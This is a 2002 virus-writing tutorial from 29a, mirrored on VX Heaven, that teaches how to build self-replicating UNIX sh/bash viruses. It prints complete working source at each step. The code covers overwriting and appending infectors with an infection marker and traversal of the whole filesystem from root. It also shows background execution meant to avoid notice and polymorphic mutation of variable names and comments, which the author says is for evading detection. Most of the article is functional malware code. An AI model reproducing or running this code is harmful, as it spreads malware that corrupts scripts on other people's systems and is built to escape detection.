Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

UNIX SH and BASH shell viruses

Gobleen Warrior
29a [6]
March 2002

1
[Back to index] [Comments]

First of all i would like to ask pardons for all grammar errors, english isn't my native language, and i am too dumb to learn it well.

What is UNIX Shell? People, who knows it, can scip some lines below, people, who knows UNIX well, can don't read this text at all. UNIX Shell is pecular BAT language of the UNIX systems, but much more advanced, functional and effective. A lot of system utilites are written in it, and it's says a lot about UNIX Shell. There is a many varieties of the UNIX Shell, for example SH, BASH, ZSH, KSH, CSH, you even can write your own UNIX Shell interpreter. It complicates writing of the programs by reducing of their compatibility. UNIX Shell language is rather flexible and universal. Equally as in the BAT, in UNIX Shell language there are internal, built-in commands, such as, for example, "cd", and external, system, commands, such as "cp", for example. In the UNIX Shell language there are constuctions like "if ... then", "for ... in ... do", and similar to them. In this article i will talk about one from numerous versions of UNIX Shell - SH and its extended version BASH.

The syntax of SH is a little similar to C/C++, and this isn't wonder - well known that UNIX is at most the C system, what is extremly depresses sometimes.

It is possible to longly argue about rationality of the writing of Shell viruses. On the one hand they are exotic enough, as BAT, on the another hand Shell in UNIX is used mush more activer, than BAT in DOS/Windows, from the third party - UNIX is a system well good protected from viruses generally and from the script viruses especially. As you can see there are a lot of the points of view. Nevertheless, the viruses of the such type are exists, so it is needed to somebody. By the way sensational Linux.Ramen worm is a half written on the UNIX Shell script. And the final words - only the shell scripts are portable on all variants of *NIX without recompilation.

Probably there are enough of words, it is time already for the code to be. The mentioned below code is a primitive overwriting virus in the current catalog, and it is strikes all files, irrespective of their type.

NOTE: I want to ask pardon for using my nick in all example viruses in this article, but here is a reason for it. The infection mark is necessary to be very rare word, and i think my nick is such kind, because no one idiot, except me, will have this stupid word in his files. That's why it isn't a stupid self-adoration, but the simple necessity (at least i hope for it).

for vic in *
do
        cp $0 $vic
done
 

There is nothing original in this virus, and the similar viruses in this or other kind were present in all texts about this theme.

How and what this virus do? For each file (designated by the variable "vic") it executes the command "cp", which copies first file to second, in our case $0 to $vic. What is the $0? This built-in variable designates first element of the command line, and in our case it is the name of executed file, which stores our virus. The sign "$" means, that contents of the variable, which name stands after this sign, are used. It is necessary to notice that in UNIX the files consider all: starting from the directories, passing through the links, and finishing the operation memory, thats why we can add yet another minus to this virus - it doesn't know what it infects. Certanly, we can bypass all this, but what the sense is to put engine from "Porche" on a children's bicycle? Normal virus MUST be non-overwriting. So lets do it.

Here is a simple example of a parasitic virus - it is adding to the end of all files in the current directory, still without any extra functions and checks.

for vic in *
do
        if [ -z "`grep -s Gobleen $vic`" ]
        then
                echo >> $vic
                tail -n 8 $0 >> $vic
        fi
done
 

Of course, this virus is far from perfection, but, at least it isn't overwriting. How is it working? For each founded file it executes the following operations: if there are not present the string "Gobleen" (infection mark), than it appends to the end of file the symbol of line feed (some files can haven't it, and if it is - there are will be an error while executing such file after infection). After this, virus appends to the end of file 8 strings from the end of current executed file, what is the body of virus. This is all. What is used for this purposes: as you can see, the condition for operator "if" is the string [ -z "`grep -s Gobleen $vic`" ]. What does it means? All is simple - 'grep -s Gobleen $vic' prints all lines in the file $vic, which containing substring "Gobleen". "-s" is here for shut down all error messages, for example, if we will try to check the file, for which we haven't access permissions. As you see, all this string is in quotation markses (""), this means that we will take the result, which will be returned from operator "grep" as a condition for check. "-z" means "if there not the string". So all this line together will mean the condition "if there not present the strings with substring "Gobleen" in the file "$vic", than execute the next commands". And the next lines are the virus commands as themselfs.

String "echo >> &vic" adds an ouput from the command "echo" to the and of file. By default, it adds to the output string the line feed symbol, but, in our case, we don't output a string at all, so command "echo" prints only the line feed symbol.

String "tail -n 8 $0 >> $vic" appends (">>") 8 strings ("-n") from the end of the file $0 to the end of the file $vic.

As you see, there are no any checks, but this isn't good. What kind of checks should we do? As minimum the next some: file for infection is a file (not a directory, for example); file for infection is executable; file for infection is a UNIX Shell script (of variety, that the virus for); we have a permissions for writing to this file (if we haven't it there are will be error messages on the screen); and plus for all this the thing we are already check - the previous infection. How we can do it all? Easily!

For checking almost all we was talking about above, we can use one very nice command - "test". Honourly speaking, we already have use it when we was checking the presence/absence of the string in the file - but there was another form of this command - "[ ... ]". Which form you will use is your decision. So, what checks can do this very nice command? I will not decribe all of them - there are tonns of them, but the main - here they are:

And it is only for work with files! And besides there are conditions for work with lines and, purely, for work with conditions as themselfs. That's why i name this function "very nice"

If we need to check an absence of some condition, for example, that file isn't a directory, we must put the symbol "!" befor the condition, for example, like that:

[ ! -d file ]

or like that:

test ! -d file

The string, which checking the presence the file "file" and it's executable attributes will be looks like that:

[ -x file ]

or like that:

test -x file

How we can to know what type of Shell scripts our file belongs for, and is it a script at all? Unfortunally, there are no 100% clear method. There are a several ways, but each one of them haves it's own minuses:

I think, that the better is to infect less, than needed, than more than it is - the first and second method is better. Which method will use you - is your decision.

The way of checking with help of the presence of the string is clear, the example of such actions was some lines above, but the way of checking with help of the command "file" must be commented. As it was writed above, this command returns the string, which describes the type of the pointed file. What we will do with this string? We can just compare it with the the string, which is stored in our body:

if [ "`file -b $vic`" = "Bourne shell script text" ] ; then

The command line parameter "-b" is needed to remove the name of tested file from the output of the command "file", we need only the type.

Also we can to give the output from the command "file" to the input of the command "grep" to check the presence of the keywords, for example the word "Bourne", and this way seems to me the better then previous, because of the word "Bourne" is presented in the type's name of the both script types - SH and BASH, and if we have the virus of the SH type, it is good for us, because we will can to check both types of victims. It's not meaningfull for the BASH script viruses, because of SH isn't support BASH, but is meaningfull for the the SH script viruse, because of BASH supports the SH. The code will be looked like this:

if [ -n "`file $vic | grep Bourne`" ] ; then

Command line parameter "-n" means, that the condition is true, when the string is presented (not empty), "|" means conveyor - the output from the command "file" is given to the input of the command "grep". As the result we will have the true, if there are the word "Bourne" in the ouput from the command "file".

After the adding of all this checks into our virus and a little optimisation, we will have such code:

for vic in *
do
        if [ ! -d $vic ] && [ -z "`grep -s Gobleen $vic`" -a -x $vic -a -w $vic ] ; then
                if [ -n "`file $vic | grep Bourne`" ] ; then
                        echo >> $vic
                        tail -n 8 $0 >> $vic
        fi; fi
done
 

Now we have not so bad virii, but, true spelling, not without the minuses. Here "-a" means logical "AND", which is used to the conditions. It means that the main condition will be true, if all subconditions are true. Why we check is it directory? Because of attribute "x", used to directory in UNIX means that we can change the current directory to that one with the command CD (or something like it), and if we will try to write to the directory like in the file - there will be an error, and the error message will be printed on the screen, that are dangerous to the virus - user can think why here is an error and find our virus.

Of course, this virus can be more optimised, but it will hamper understanding.

Now about the minuses - here are several of them:

  1. We are appending to the end of virus. But what will be, if the victim is finished with the command "exit"? Of course, there are very few such files, normally this command is used for exiting from the middle of the script, but it isn't more good - in the both cases our code can not be executed, and if in the second case we are still having any chances, but in the first we haven't them. And it is, you see, unpleasant.
  2. Besides it, our virus is working in the current dirrectory, and it deprives it almost of all chances to live. What we have to do? There are the several ways:
    • infect the files in the pre-declared directoryes, such us /bin, /usr/bin and etc.
    • old good DOT-DOT - go up thru the directoryes' tree, while not going to the highest level.
    • directory traversal loop.

The first to ways, it seems to me, aren't effective enough, because they haves any limits, and this isn't good, especcially, if to take into account the fact, that Shell-scripts are very limited without that. Thats why we will consider at once the third way, as, by understanding it, you will can understand and write the first two ways by yourself.

So, directory traversal loop. It can be realised, as a minimum, by the two methods: with the help of recursive calls of the procedure with the system functions of directory changing, and with the help of the system function "find". For certain, there are also other methods, but i think that this two is enough for the begining. If you will have the strong desire to do it by the different methods - thats good, UNIX Shell is rather flexible and functional to allow you to do it without the special transactions.

First method: recursive search with the help of the internal procedure:

do_dir () {
        cd $1
        for vic in *
        do
                if [ -d $vic ] ; then
                        do_dir $vic
                else
                        if [ -z "`grep -s Gobleen $vic`" -a -x $vic -a -w $vic ] ; then
                                if [ -n "`file $vic | grep Bourne`" ] ; then
                                        echo >> $vic
                                        cat /tmp/vic$$ >> $vic
                        fi; fi
                fi; done
        cd ..
}
tail -n 17 $0 > /tmp/vic$$
do_dir /
rm /tmp/vic$$
 

How is it works? Very simple. All code between the first line and the line "cd .. }" is a procedure, which is responsible for the processing of the directory, which name is given to this procedure as a parameter. When this code starts, the execution will be processing from the command "tail", what will create the file with the clear virus body and unique name in the directory /tmp. After that the procedure do_dir () will be called with the parameter "/", what means the root of the directoryes' tree. After this function will complete, the file with the clear virus body will be erased. What the do_dir () procedure do? At the first step it changes the current directory to the directory, which name was given to this procedure as a parameter. Need to comment, that this name is short, without the full path, thats why directory changing will be in the current directory. After this, for all files/directoryes in this directory will be executed the next commands: if it is a directory - do_dir () will be recursively called with the name of founded directory as a parameter; if it is a file - it is infecting. After processing all files/directoryes in the current directory, it will be changing to the upper (".."). Processing of all directoryes' tree thus happens.

NOTE: Pay attention, this procedure should be placed higher. than all those lines, from which it is called, otherwise, the system will not understand, what do you want from it, because of for that moment this procedure will be unknown to the system.

Second method: the using of the system function "find". I think, this method must be much more commented.

"Find" utility is intended, first of all, for files finding, but apart from it, this utility haves many nice functions (this is peculiar to almost all UNIX utilites). One from this utility's skill is a search for files with specified attributes, another is executing some actions for each from the founded files. For example, the next command finds all executable files (executable attribute is setted at least to one from three variants - "owner", "group", "other") in the current directory and shows their names to the screen:

find . -type f -perm +111 -exec bash -c \
"echo WE FOUND FILE {} HERE!" \;
 

Why is it working? Because of for each one founed file we execute the BASH enterpreter with the parameter "-c", what means "take the commands from the next coming string", and the next comming is the string with the command "echo", which shows text to the screen. The symbol "{}" means the name of the file, processing at this time by the command "find". This commands must be writed in the specified form like "commands" \; because of only in this form the interpreter understand them as a one string and transmit this string to the interpreters copy, which is executed by us. Besides that, we must to shield (put the symbol "") before the language elements, which can hinder the interpratation of this string (like "'", "$" and etc.). It will be shown much more visually, and, i hope, clearly in the next example below.

Now about the "find". I will not put here all it's parameters, because all of them is useful, but there are so much of them, and the putting of them here means the putting of the full text of the MAN-file, but it is not in the frameworks of this tutorial. Thats why i will describe only those parameters, which i will use:

Now here the code:

tail -n 8 $0 > /tmp/vicGWI
find / -type f -perm +111 -exec bash -c \
"if [ ! -d {} ] && [ -z \"\`grep -s Gobleen {}\`\" -a -x {} -a -w {} ] ; then
 if [ -n \"\`file {} | grep Bourne\`\" ] ; then
  echo >> {}
  cat /tmp/vicGWI >> {}
fi; fi"
\;
rm /tmp/vicGWI
 

This virus is functionally similar to the previous. It was necessary to change the name of the temporary file, because of the variable "$$" means the number of current system task, but in this virus, in the difference from the previous, the number of the task is changing for each file, because we start the new task - the copy of BASH interpreter.

Ok, it's good, now we can to do much things, but here is a bad thing - we are working to slow. What we should to do? Very easily! If we put the symbol "&" in the end of the command line, the command will be running as the background process, what means - not noticeably, and it is what we need. But there is one problem - if we simply put this symbol in our virus - the virus will be crashing. Why? Because of after execution of the command "find" at the background, the system will not wait it's completion, and will execute the next command - "rm". Our clear virus body will be erased, and the virus will not found it for infection. So it will be crashed. We can do not erase this file at all, but, i think, it isn't good. So we need to think a little and do a litle wily trick. All would be much easier, if we were wrote our virus in a beginning of the file, but if we have selected the hard way, we should go on it up to an extremity:

tail -n 9 $0 > /tmp/vicGWI; grep -v runGWI /tmp/vicGWI > /tmp/runGWI
chmod 755 /tmp/runGWI; (/tmp/runGWI &); exit 0
find / -type f -perm +111 -exec bash -c \
"if [ ! -d {} ] && [ -z \"\`grep -s Gobleen {}\`\" -a -x {} -a -w {} ] ; then
 if [ -n \"\`file {} | grep Bourne\`\" ] ; then
  echo >> {}
  cat /tmp/vicGWI >> {}
fi; fi"
\;
rm /tmp/???GWI
 

So, as you see, it is very funny thing. What is the difference between it an the previous one? When infected file is executed, virus creates 2 temporary files in the directory /tmp. One of them, which name is "vicGWI", stores the clear virus body, second one, it's name is "runGWI", is a file, which is processing the infection. After the creation of them, virus executes the file "runGWI" as background process, and finishes the program's work. Therefore practically there will be no time delay, and the infected files will not be the suspiciously hanged up when they will be executed.

Now we know how to write UNIX shell script virus, and we need to increase it's vital abilities. As here isn't any good *NIX heuristic analysers, all we need (at the beginning) is a polymorphic functions.

So, polymorphism. There is a two simple ways of doing this for script viruses - mutation of the variables' and functions' names and inserting of a random comment strings into the random (or not) places of the virus body. It is a simplest methods. Of course, there are other methods, a little, or much more advanced, but all of them was born from this two methods, so, lets talk about them.

No matter what method you prefer, you will need a random numbers generator. How to make it? Not so hard. There are built-in variable $RANDOM in the BASH Shell. In the documantation i read, that SH haven't it, but i found this variable working on QNX's SH Shell (not BASH!). So, i think, it must be presented on both types of Bourne Shell (SH and BASH). What is this variable? When you call it, the system generates a random number and puts it into this variable, so, it is what we need. But there is one little problem, this number is too big, as i can found it in my tests on Linux, so we must to make some function to make it more usefull to us. My variant of this function looks like that:

do_random_number () {
        RANDOM=$RANDOM
        return `expr $(($RANDOM % $(($2 - $1)))) + $1`
}
 

How is it working? The first string is a randomiser, which makes the $RANDOM much more random, then it is at the start. You may not use this operation, but better is to do it. The second string creates a random number in a range, which is specified by data-ins of the function. As you can see, there is a two data-ins - $1 and $2, the beginning and the end of the range. So when you need to get a random number, do the next:

do_random_number x y

Here "x" is the beginning, and "y" is the end, of the range, where should be the random number you need.

What else do we need? We need, of course, the functions, which will do the mutation of the selected type. On both types the part of the mutation is the creation of the strings of the random length, containig from the random letters. We need the procedure to create this strings. Here is a millions ways to write it, i did it like that:

until [ $variable_length -eq 0 ] ; do
        do_random_number 65 122
        symbol=$?
        if [ $symbol -lt 91 -o $symbol -gt 96 ] ; then
                mutated_variable=$mutated_variable`echo -e '\'$(printf %o $symbol)`
                variable_length=`expr $variable_length - 1`
        fi;
done
 

What are this commands do? The loop with "until" means "do loop, while the condition is false. In our case - while variable "variable length" isn't equal to zero. Thi variable is the length of currently generated string, and better to make it random. The next string gets a random number in the range from 65 to 122 - it is the significance of the letters in the ASCII table, but this range contains the subrange, which contains not the letters. It is from 91 to 96, so we need to check, is our random number in this range, and, if so, take the random number again. It is checked in the next lines with the help of the operator "if". Third string means "variable "symbol" is equal to the output from the last command". The last command's output is marked as the built-in variable "$?". So we take the output from the random numbers generator. Next line, as i say above, is the check for the suitability of the random number for our purposes. How we do it? With help of very nice command "test". Do you remember i spoke, that it has a lot of useful parameters? Here it is a little more from them. They are used for work with numerals:

So, as you see, we check the next: "if the variable "symbol" lower than 91, or ("-o") it is greater than 96, do the commands". In the next line you can see the string "mutated_variable=$mutated_variable`echo -e '\'$(printf %o $symbol)`". What is it doing? It generates the letter by it's number in the ASCII table and adds this letter to the generated string. How? Simply. Command "echo -e" means "output the symbol, which octal number in ASCII table is "\xxx", where "xxx" is the number. Symbol "" is needed according to the syntax of the command. The number "xxx" is converting from the decimal to the octal form with help of the command "printf", which, in our case, shows the number "symbol" in the octal ("%o") form. And the next line reduces the counter "variable_length" on 1. After looping of this cycle, the variable "mutated_variable" will contain the fresh-generated string. All we need is to take it and use as we need.

This information is enough to make the first step - virus, which mutates its variables' and functions's names. So, lets do it:

tail -n 29 $0 > /tmp/pure_virus; tail -n 27 $0 > /tmp/infector
chmod 755 /tmp/infector; (/tmp/infector &); exit 0
variables="pure_virus infector variable_length mutated_variable mutation temporary do_random_number variable_name symbol variables"
do_random_number () {
 RANDOM=$RANDOM
 return `expr $(($RANDOM % $(($2 - $1)))) + $1` }
mutation () {
 sed s/$1/$2/g /tmp/pure_virus > /tmp/temporary; cp /tmp/temporary /tmp/pure_virus }
for variable_name in $variables; do
 do_random_number 4 14
 variable_length=$?
 mutated_variable=""
 until [ $variable_length -eq 0 ] ; do
  do_random_number 65 122
  symbol=$?
  if [ $symbol -lt 91 -o $symbol -gt 96 ] ; then
   mutated_variable=$mutated_variable`echo -e '\'$(printf %o $symbol)`
   variable_length=`expr $variable_length - 1`
  fi;
 done
 mutation $variable_name $mutated_variable
done
rm /tmp/temporary
find / -type f -perm +111 -exec bash -c \
"if [ -z \"\`grep -s Gobleen {}\`\" -a -w {} -a -n \"\`file {} | grep Bourne\`\" ] ; then
 echo >> {}
 cat /tmp/pure_virus >> {}
fi"
\;
rm /tmp/infector; rm /tmp/pure_virus
 

This virus is made on the base of previous one, but with some modifications, optimisations, bug-fix and adding of the main part - the mutation mechanism. Ok. Now about it's work. First two lines is creating of the clear body and infector, it is not changed. Next is string, which contains the names, which must be mutated. After this is a random generaton function, you know it, and the mutation function. A few words about it.

The main job of the mutation() function is replacing of all strings being to mutation to the new fresh-generated strings. The first data-ins parameter of the function is an original string, the second is the string which will replace original string. We do this with help of the function "sed" - String EDitor with a command "s" - substitute the first expression with the second expression. Flag "g" means globally substitution for all nonoverlapping instances of the regular expression rather than just the first one. The function mutation() is called for each one mutable string in the virus body. After a looping of the cycle "for variable_name in $variables" we have a mutated version of the virus into the file "/tmp/pure_virus". After this, we search and infect all approaching files in the directory tree.

There are a little optimisation in the infection part - all unnecessary parameters and commands was removed, but i hope you can understand all of this optimisations now.

So, we've written the simple polymorphic virus. Next step is the adding of the random comment lines in the random places of the virus body.

I think you can do it yourself now, after understanding of all info above, but in any case i will bring an example of it.

What do we need? First of all - random numbers generator - we have it. The second - infection part - we have it. The third - mutation part, we still haven't it, so, lets write it now.

What will this function do? Generate a number of comments, a length of each comment, and the comments as itself. After this, this comments will be added to the virus body. I know my variant of this function is veeeeery lame, but it was first that came into my mind. If you know how to do it better (i know there is another methods) so do it. Here is my variant:

 do_random_number 3 `expr $virus_length / 3`
 split -l $? /tmp/pure_virus /tmp/virus_piece
 for body_part in /tmp/virus_piece* ; do
  mutated_string=""
  do_random_number 15 50
  create_string $?
  echo '# '$mutated_string >> $body_part
 done
 cat /tmp/virus_piece* >> /tmp/temporary
 

How it works? First line generates a random number in range between 3 and the count of lines in virus body divided by 3. This random number is a position to insert a random comment line. On the second string we split virus body to pieces, each of which contains number of lines, determined by the previous command. After this, we generate and add a random comment line at the end of each piece of virus body and merge this pieces into one file.

The "create_string()" function is already familiar to us from the previous virus, it is just moved to the separate function. Here it is:

 create_string() {
  variable_length=$1
  until [ $variable_length -eq 0 ] ; do
   do_random_number 65 122
   symbol=$?
   if [ $symbol -lt 91 -o $symbol -gt 96 ] ; then
    mutated_string=$mutated_string`echo -e '\'$(printf %o $symbol)`
    variable_length=`expr $variable_length - 1`
   fi;
  done }
 

Nothing new, isn't it? Here is only a few things which, as i think, requires the comments. As you see, this function returns nothing. Why? Because we need it returning the string, but the functions can't return nothing, except from number constants. Therefore we had to be artfull. You see this function uses variable "mutated_string", so our artfull thing is obviously - we define this variable before calling this function, and after it this variable will contain the string we need.

And another thing we must to do - remove all comments from the file before adding the new. If we will not do it, virus will not work. It is all i want to say, now the code.

virus_length=45
echo -n "`cat $0`" | grep -v '^#' | tail -n $virus_length > /tmp/pure_virus
echo \#!/bin/bash > /tmp/infector; head -n 1 /tmp/pure_virus >> /tmp/infector
tail -n `expr $virus_length - 5` /tmp/pure_virus >> /tmp/infector
chmod 755 /tmp/infector; (/tmp/infector &); exit 0
variables="pure_virus infector variable_length mutated_string mutation temporary do_random_number variable_name symbol variables create_string virus_length virus_piece body_part"
do_random_number () {
 RANDOM=$RANDOM
 return `expr $(($RANDOM % $(($2 - $1)))) + $1` }
mutation () {
 sed s/$1/$2/g /tmp/pure_virus > /tmp/temporary; cp /tmp/temporary /tmp/pure_virus }
create_string() {
 variable_length=$1
 until [ $variable_length -eq 0 ] ; do
  do_random_number 65 122
  symbol=$?
  if [ $symbol -lt 91 -o $symbol -gt 96 ] ; then
   mutated_string=$mutated_string`echo -e '\'$(printf %o $symbol)`
   variable_length=`expr $variable_length - 1`
  fi;
 done }
do_random_number 3 `expr $virus_length / 3`
split -l $? /tmp/pure_virus /tmp/virus_piece
for body_part in /tmp/virus_piece* ; do
 mutated_string=""
 do_random_number 15 50
 create_string $?
 echo '# '$mutated_string >> $body_part
done
cat /tmp/virus_piece* >> /tmp/temporary
rm /tmp/virus_piece*
mv /tmp/temporary /tmp/pure_virus
for variable_name in $variables; do
 mutated_string=""
 do_random_number 4 14
 create_string $?
 mutation $variable_name $mutated_string
done
rm /tmp/temporary
find / -type f -perm +111 -exec bash -c \
"if [ -z \"\`grep -s Gobleen {}\`\" -a -w {} -a -n \"\`file {} | grep Bourne\`\" ] ; then
 echo >> {}
 cat /tmp/pure_virus >> {}
fi"
\;
rm /tmp/infector; rm /tmp/pure_virus
# This comment is necessary!
 

What i can say about this virus? We put the count of virus lines to the variable "virus_length" because of we use this number more than one time, and it is much more convenient to store it into the variable. Why we put the comment into the end of the code? Because we need to have the newline symbol there, and after erasing the comments we will have it. Without the newline symbol the virus will crash in the next generation. And last words. We put the string "#!/bin/bash" at the beginning of the file with the purposes of increasing of the reliability of a code. If the default interpreter isn't BASH (SH), without this string the file "/tmp/infector" will crash with a high probability. With this line all will be ok (at least i hope for it).

I hope you've understood all i haven't told about this virus.

Here is, i think, all i want to say in this tutorial. I consciously didn't consider prepending viruses, because of the understanding of all written above is allow to write them without a large transactions. By the way, the work with them is much easier an more pleasant, than with the appending viruses.

And generally, the UNIX Shell world is so polyhedral and interesting, so it is unreal to describe in one article everything, about what it would be desirable to tell, for it should be written the rather thick book, but not the article.

As for the possibilities and ways of development of the UNIX Shell, so, probably, it will remain by something exotic, probably not, because it is rather functional, of what i was convinced another one time, while writing the programs for this tutorial. At this words i finish this article, not telling even about 30 percents of possibilities of the UNIX Shell. If somebody will find this tutorial interesting and useful to himself, i will be very glad.

Thank you for spending your time for reading this article, and excuse me again for my terrible english.

P.S: There are all examples from this article in the enclosing archive. They are in UNIX tabulation - 1 symbol for line feed.

P.P.S: I want to thank people, whose sources i have looked, while learning shell script language: Quantum and SnakeByte, thank you very much!

Gobleen Warrior//SMF 1901
[Back to index] [Comments]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua